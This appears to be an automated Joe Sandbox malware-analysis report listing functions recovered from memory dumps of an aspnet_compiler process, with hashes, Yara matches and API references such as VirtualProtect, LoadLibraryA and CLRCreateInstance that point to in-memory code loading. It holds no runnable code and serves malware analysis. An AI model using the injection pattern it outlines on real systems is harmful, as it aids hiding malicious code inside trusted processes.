Instruction ID: 5317a1cbca73e9e77685f72f1ab1fe074448fb91ff9f7919adbca203012d484b
Opcode Fuzzy Hash: 6be7ad9f6a51b0a0dfc24b6d3aea0691cc6ab0a4a979b8553b8fc8565cca7bc9
Instruction Fuzzy Hash: CB422D70A08A1E8FDB95EF68C494BADB7F1FF59300F1041A9D40DE7292CA78A985CF51

Function 00007FFD34858A1C Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7cd1cbbc591438a11cca6d2adaefad69317709746501b8dc42b0184f87c669
Instruction ID: c41a8677a20c422cde62be484b0249f6c724d6fd82308176e02b4411caf85775
Opcode Fuzzy Hash: 7d7cd1cbbc591438a11cca6d2adaefad69317709746501b8dc42b0184f87c669
Instruction Fuzzy Hash: 00022F30A0961E8FDB95EF68C494BA9B7F1FF5A300F5441EAD40DE7292CA389985CF11

Function 00007FFD34856E1F Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33b7029665d4576d5576f67d5d19a37c358abd36923a04ba7711abb63ed2133
Instruction ID: 5fb2a404e9c49483321ad4c9591304d14b7cc1cd653b06f708f0b1a2aaf55b75
Opcode Fuzzy Hash: a33b7029665d4576d5576f67d5d19a37c358abd36923a04ba7711abb63ed2133
Instruction Fuzzy Hash: 3F919830A0955D8FDBA4EF68D895BA9B7B1EF59301F5042E9D00DE7291CA39ADC1CF04

Function 00007FFD3485A141 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1472258e3ebae7921e48ab8fe40915d1adf6b997331c5044cf6a5697fdeadd0
Instruction ID: 421f2c455a42ccc9c4ed50fd728e488f1060b15ef05604cc1798dfb63d145506
Opcode Fuzzy Hash: a1472258e3ebae7921e48ab8fe40915d1adf6b997331c5044cf6a5697fdeadd0
Instruction Fuzzy Hash: FC017430E0421E8AEB10EF95C4907FEB3B1EF86301F00817AC228A31C5CB796589CF80

Function 00007FFD34851999 Relevance: 11.8, Strings: 9, Instructions: 519
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h|04, xrefs: 00007FFD34851CBB
h|04, xrefs: 00007FFD34851A00
h|04, xrefs: 00007FFD34851D92
h|04, xrefs: 00007FFD34851C8A
h|04, xrefs: 00007FFD34851AEA
h|04, xrefs: 00007FFD34851B1B
h|04, xrefs: 00007FFD34851D65
h|04, xrefs: 00007FFD34851D2B
h|04, xrefs: 00007FFD34851BA0

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: h|04$h|04$h|04$h|04$h|04$h|04$h|04$h|04$h|04
API String ID: 0-4087857264
Opcode ID: d5b1be702ab3c6363f8f49aebc366dff813dc8f8abff937bdb3f36453a0fa30d
Instruction ID: def0d496c1c28831ee0005f3190d3c573da6cf1ad9b0e863fa5a202892b24a24
Opcode Fuzzy Hash: d5b1be702ab3c6363f8f49aebc366dff813dc8f8abff937bdb3f36453a0fa30d
Instruction Fuzzy Hash: D302D131A0DA8E9FDB56DF6488656E8BBF1FF46304F0401FBD409E7192DA2C6885C752

Function 0000022934031B04 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000229340343B4: LoadLibraryA.KERNELBASE ref: 0000022934034482

VirtualProtect.KERNELBASE ref: 0000022934031B80
VirtualProtect.KERNELBASE ref: 0000022934031BA9
VirtualProtect.KERNELBASE ref: 0000022934031BEE
VirtualProtect.KERNELBASE ref: 0000022934031C12

Memory Dump Source

Source File: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022934010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22934010000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction ID: 4c2917917616f9894a32f930cf8f8afbb2c423bcd394f971240325e3e721dc83
Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction Fuzzy Hash: 8D31C73131CA085BD758EE689C8936A77D5E7C9720F0112ADA84BD72C6DE70DD864BC1

Function 0000022934031B73 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000022934031B80
VirtualProtect.KERNELBASE ref: 0000022934031BA9
VirtualProtect.KERNELBASE ref: 0000022934031BEE
VirtualProtect.KERNELBASE ref: 0000022934031C12

Memory Dump Source

Source File: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022934010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22934010000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction ID: d8ea51a619bf13c69b8db2cd61950d6b341d6956dc5ade9b43234aedcf70c0aa
Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction Fuzzy Hash: A521A83131C6085BDB58E95CA89936977D1E7C8720F1111A9EC4BD72C6DE30DD8647C1

Function 0000022934032928 Relevance: 4.8, APIs: 3, Instructions: 257
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 0000022934032974
SysAllocString.OLEAUT32 ref: 0000022934032A90
SafeArrayDestroy.OLEAUT32 ref: 0000022934032B74

Memory Dump Source

Source File: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022934010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22934010000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: 7a60d8243bc9755817875281088f6ee5deed5c439dbffac0438a07ee39778c9a
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: AA814C30218E089FD768EF28D8897A6BBE0FF9A305F1146ADD49AC7151DB30E5458F82

Function 00000229340343B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000022934034482

Strings

l, xrefs: 000002293403441C

Memory Dump Source

Source File: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022934010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22934010000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: 32d504d45a7d1a745f7e6d5b8270f2b962a192c847e03d8b7d604c92f20983aa
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: 3531942061CA855FE795DB68C048726BFD5FBAA308F2556FCC0DAC7152D730D8868B01

Function 0000022934031C30 Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000229340343B4: LoadLibraryA.KERNELBASE ref: 0000022934034482

VirtualProtect.KERNELBASE ref: 0000022934031C7E
VirtualProtect.KERNELBASE ref: 0000022934031CA6

Memory Dump Source

Source File: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022934010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22934010000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: 6f5ab1c0fd9e7ab4cc248ea5819121a12231d218d6713ae1326da7ea8d5ae72a
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: 2C11C830728A085BDB95EB68D8C976A77E5FBDD700F0015B9AC4AD7285DE30DD818B81

Function 00007FFD348564AE Relevance: 2.8, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD348564D9
t, xrefs: 00007FFD34856734

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: U$t
API String ID: 0-1612724633
Opcode ID: d9624b0c150e1109a2fb89e6379ea7b3cb498cf62579b340a7c8dd133e7eef3d
Instruction ID: 28760845f05ca31fba17cdbf00d657217252f47a302be6e43cfc1c92b333d795
Opcode Fuzzy Hash: d9624b0c150e1109a2fb89e6379ea7b3cb498cf62579b340a7c8dd133e7eef3d
Instruction Fuzzy Hash: 8DA14D70A08A5E8FDB99DF68C865BD8B7F1EF5A300F5401EAD44DD7292CA3869C1CB11

Function 00007FFD3485D47A Relevance: 1.8, Strings: 1, Instructions: 564
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

N, xrefs: 00007FFD3485DB23

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 96105c07e1173eb1120e2fcffa87b865f8ebdfea7311b79bcb2259dec24ca03b
Instruction ID: c3bf024245a10453a7eeec1a56b2d33e55e25b24d51cd09ffd54041c1b6a7915
Opcode Fuzzy Hash: 96105c07e1173eb1120e2fcffa87b865f8ebdfea7311b79bcb2259dec24ca03b
Instruction Fuzzy Hash: 3622F37190D28A8FDB12DB2488656E97FF0EF13314F0542EBC449DB1E3DA385A49CB91

Function 00007FFD34856008 Relevance: 1.4, Strings: 1, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD348560A9

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: c61deb044dc1639665089ffabd052027acab14e3dbee64de58a9b44e43ebd154
Instruction ID: 8298474837f1f3923348d32c94f07e6be69333a4d5b292abf3e2890f8630a0b5
Opcode Fuzzy Hash: c61deb044dc1639665089ffabd052027acab14e3dbee64de58a9b44e43ebd154
Instruction Fuzzy Hash: F951C031A4E78A4FD7539BA488746E9BFB1EF47210F4901E6D448DB1A3CA2C1989C762

Function 00007FFD34850862 Relevance: .9, Instructions: 875
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46168616d60b09a6c863b1d1935de82f7e126866da5bc81385dac99ee39db090
Instruction ID: 4ecbc1e444c1b60d57c269b2bc08ee7f41d77209ac463b4518e420921ae46f8f
Opcode Fuzzy Hash: 46168616d60b09a6c863b1d1935de82f7e126866da5bc81385dac99ee39db090
Instruction Fuzzy Hash: 58722D30A08A4A8FDB95EF78C968698BBF1FF5A340F0540E6C44DDB262DA785DC1CB11

Function 00007FFD3485EA75 Relevance: .5, Instructions: 496
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8031e8d84d3471112c0cfc66663485bc52abb07d6d0966587e4eede2714bdc2d
Instruction ID: 731a8085a25513fe0e6b2b25bb89bae2b6cd84d9131c37e46a31ee107fa8dbb3
Opcode Fuzzy Hash: 8031e8d84d3471112c0cfc66663485bc52abb07d6d0966587e4eede2714bdc2d
Instruction Fuzzy Hash: 6E124B31A1861D8FDB58EF68C8A47EDB7B1FF59304F2041A9D00DE7286CB39A985CB54

Function 00007FFD34855631 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89ace391be62c25d3d20c870a62d459ec14d68a6dba04c3169c8958a034983c
Instruction ID: 5864367fc1561dedb14dc52430506879acfd05d2294de983e2bf0e8038c275f0
Opcode Fuzzy Hash: c89ace391be62c25d3d20c870a62d459ec14d68a6dba04c3169c8958a034983c
Instruction Fuzzy Hash: 4CB1A93284E38D8FD7625B2489A52E97FB0FF47310F4901E6D945C60E3EB2D6518D742

Function 00007FFD348581F3 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d061917d3aafc8b559b10247c323b95968b4644b909baa524a2822be34484298
Instruction ID: d9e068565d952ce947963a35d8d08abe97a198497f4e6e2eb8f8c9bdaf281f21
Opcode Fuzzy Hash: d061917d3aafc8b559b10247c323b95968b4644b909baa524a2822be34484298
Instruction Fuzzy Hash: 3551F772E0D68D4FE761EB6898652F87BA0EF46320F4401FBC58CD7192DE285955C741

Function 00007FFD34854CCF Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b9d831aa21293ad639a98ea4292d5e083f580f2f809cf5a18d4826a00c5fd7
Instruction ID: 29beff733ee680a2adc33cc9d9960b849443b05ad16d28476d1f5faa7f59f505
Opcode Fuzzy Hash: d7b9d831aa21293ad639a98ea4292d5e083f580f2f809cf5a18d4826a00c5fd7
Instruction Fuzzy Hash: 1FB12E70A08A5D9FDF95EF68C854BA9BBF1FF5A300F0401AAD44DE7252DB34A981CB41

Function 00007FFD348530C8 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc910b203ada6b2a597a23fbd6e869409b370a4fb871124ce9d8574c64ab47f
Instruction ID: c2b6623febc7f851187c7d2c9eeb5b1ecdff3c3e2c1e7f1813bd82b97dab2672
Opcode Fuzzy Hash: 8bc910b203ada6b2a597a23fbd6e869409b370a4fb871124ce9d8574c64ab47f
Instruction Fuzzy Hash: 22C17271A08A5D8FDB95EF68D8A47E87BF1FF59300F1401EAD04DE7292DA34A985CB01

Function 00007FFD3485293D Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb267599817318000482de84e448fb4012400d68af4e6b16eec02325527c4f91
Instruction ID: 448ac8e50b38cce6672de58a8c0c47cc4c91353bb01aed0e877c7ea2d09d9f10
Opcode Fuzzy Hash: bb267599817318000482de84e448fb4012400d68af4e6b16eec02325527c4f91
Instruction Fuzzy Hash: 1AB1FC70A08A5D8FDB95EF68C4A4BACB7F1FF59300F5441EAD04DE7292DA34A985CB01

Function 00007FFD34851E72 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4c42e02981655de809f311612691866c64d636655aea8d0a94e36e17641d0c
Instruction ID: 36ff57d6e9a35c821c6ce00fd6d2f9f248f99a07e27f2ae31de701bd9217e858
Opcode Fuzzy Hash: 4c4c42e02981655de809f311612691866c64d636655aea8d0a94e36e17641d0c
Instruction Fuzzy Hash: 65B1E970E08A4D8FDB95EFA8D494AACBBF1FF5A301F4501A6D40DE7252DB34A981CB01

Function 00007FFD34855A09 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50534c1e231a4815675ee809ce08641ede4a3a28c85a4a44fdbbf1f2a152acf4
Instruction ID: a9574e3d99d809f6669e87eef1630ff9238bb83bc643d03088defc2b4c4c6aef
Opcode Fuzzy Hash: 50534c1e231a4815675ee809ce08641ede4a3a28c85a4a44fdbbf1f2a152acf4
Instruction Fuzzy Hash: F2A1DF31A4964E8FDB95DFA4C8A86ED7BB0FF47310F1001AAD009D7292DB3DA985CB51

Function 00007FFD34855228 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab568508f055cbaf4966edcba770a9971a9aa0a23783ad3a097bc80007ca93f
Instruction ID: 1e7a5c004445e45162d3b357e03c6bcdae648f3da89c0a1aebcc812db5445bb1
Opcode Fuzzy Hash: 7ab568508f055cbaf4966edcba770a9971a9aa0a23783ad3a097bc80007ca93f
Instruction Fuzzy Hash: 9E616516BEF25B16E19237B864FB0FF2A549F43319F846DB2E25CC50DB8C4C30096295

Function 00007FFD34851E90 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de626d4d330db5dfced4b3dddf5cd2e764b92adf6af0dd989da3299907c7e85
Instruction ID: cb62ecd5e3ec85fbfd1563ee76248c7e33dc0d53e3d17bdacf7230a0877925c9
Opcode Fuzzy Hash: 8de626d4d330db5dfced4b3dddf5cd2e764b92adf6af0dd989da3299907c7e85
Instruction Fuzzy Hash: FA91EA70A08A5DCFDB95EF6CD494A98BBF1FF5A300F5501AAD40DDB251DB34A981CB01

Function 00007FFD34855230 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ca2ee1294cc44207ec01a04e6e23ae11db8a88db7f7361ab5e280535755270
Instruction ID: 6e3fe0283c9b4d77acb93df43a164021819e68a6a6933927cd571288977690d8
Opcode Fuzzy Hash: e6ca2ee1294cc44207ec01a04e6e23ae11db8a88db7f7361ab5e280535755270
Instruction Fuzzy Hash: 9E614516AEF25B19E292377864FB1FF2A549F43319F846DF6E25CC90DB8C4C31096291

Function 00007FFD34855250 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a72c494b56098513d2b5b47db696b139b5dbac62ba3cb83472ec8e78b91aad
Instruction ID: bc685698ce760368ed71de4a32e49bfd82daebfc51ff4e9fb8098d2c7ba6afb6
Opcode Fuzzy Hash: e8a72c494b56098513d2b5b47db696b139b5dbac62ba3cb83472ec8e78b91aad
Instruction Fuzzy Hash: EE513416AEF29B19E292377864FA1FF2A54DF43319F846DF6E25CC60DB8C4C31096291

Function 00007FFD34850598 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5ebfccd4c5098ec6c0d74c53d948f94cb82b56cb4e4a215139e31bb6288bda
Instruction ID: 6cc0f9873d15056231e5138d9f8e94a92ce67ade1ddee556b66058c78551b2ce
Opcode Fuzzy Hash: 1e5ebfccd4c5098ec6c0d74c53d948f94cb82b56cb4e4a215139e31bb6288bda
Instruction Fuzzy Hash: B7719470A08A1D9FDF94EF68C899BACB7F1FF69301F1001AAD40DE7251CA74A881CB40

Function 00007FFD3485A9E5 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34f7181c8efecebbd91a83dca9e7a062dd720c12aefb9b4dbdfcad41c47446e8
Instruction ID: 3f9cef2a592a7b73afa8e1ff2cea3e9e066d5406aed6510b3c28898b52c30c93
Opcode Fuzzy Hash: 34f7181c8efecebbd91a83dca9e7a062dd720c12aefb9b4dbdfcad41c47446e8
Instruction Fuzzy Hash: 90816F31D0961E8FEBA5EB14C8E1AE9B7B5FF12301F0002F9D50DD7191DA386A89DB81

Function 00007FFD34855298 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2e3d120e5499c4138221da5dd2c82c1b44294b6f1d6cb821a947b3c1f3f315d
Instruction ID: c5ae680dddd3d43d2ec213276104b4917ce80dd3b10dcd2bb5a1087f1f73321a
Opcode Fuzzy Hash: f2e3d120e5499c4138221da5dd2c82c1b44294b6f1d6cb821a947b3c1f3f315d
Instruction Fuzzy Hash: 35510C16AEF24B19E2927B7454FA1FF2A50DF43309F856DF6E24CC60DB8C4D35086692

Function 00007FFD3485EEBA Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5592a009f7a565714e2a3e2b69b277221eddeda1352d53aa186d4fc7b9fd3388
Instruction ID: 8922859445fff2b7c223e7470cdc11f003edb9b095b526376899291d07eedecb
Opcode Fuzzy Hash: 5592a009f7a565714e2a3e2b69b277221eddeda1352d53aa186d4fc7b9fd3388
Instruction Fuzzy Hash: D7519E31A08A0E8FDB58EB58C8A06FDB7A5FF55314F1041BAD50DE3296DE38A945CB50

Function 00007FFD34855210 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ee3af9fa20f8e3dcde1176fb6c0062077963edc87cb22bfb220ae0f689c14e
Instruction ID: 87b5a5f9811ee42966661a5d2f5a3f9e0f34056ff265e1346fad0dfa5594cc44
Opcode Fuzzy Hash: 58ee3af9fa20f8e3dcde1176fb6c0062077963edc87cb22bfb220ae0f689c14e
Instruction Fuzzy Hash: 9E41D416BEF19B19E292377864FA4FE2A54DF83329F846DF6E25CC50DB8C4C34056291

Function 00007FFD348552C8 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02bcdb1d990846b79b8e1b753bdad1d505de5c2177e4f148891e1b9f0c0cabd
Instruction ID: 8050491208f472f9dd6870cc68b4c4c145a973660b3cfff519efa2c36ee17092
Opcode Fuzzy Hash: b02bcdb1d990846b79b8e1b753bdad1d505de5c2177e4f148891e1b9f0c0cabd
Instruction Fuzzy Hash: 9741B415AEF20B65E5923B3850FA5FB1990EF03709F906DF4E20C8549B5D9D32186692

Function 00007FFD34855D79 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77780ba86526c2675219bdef200883c6376c185d06aa7edcc499614b862c243
Instruction ID: 55a9dac7612712a4d0b70f1fe0681a6dec732338ca1ac1bb53d9533a32c820b3
Opcode Fuzzy Hash: b77780ba86526c2675219bdef200883c6376c185d06aa7edcc499614b862c243
Instruction Fuzzy Hash: E251C131E4960A8FDBA5EF64C4A46BD7BB1FF06300F1001B9C109E7296DB396445CB11

Function 00007FFD3485EE66 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
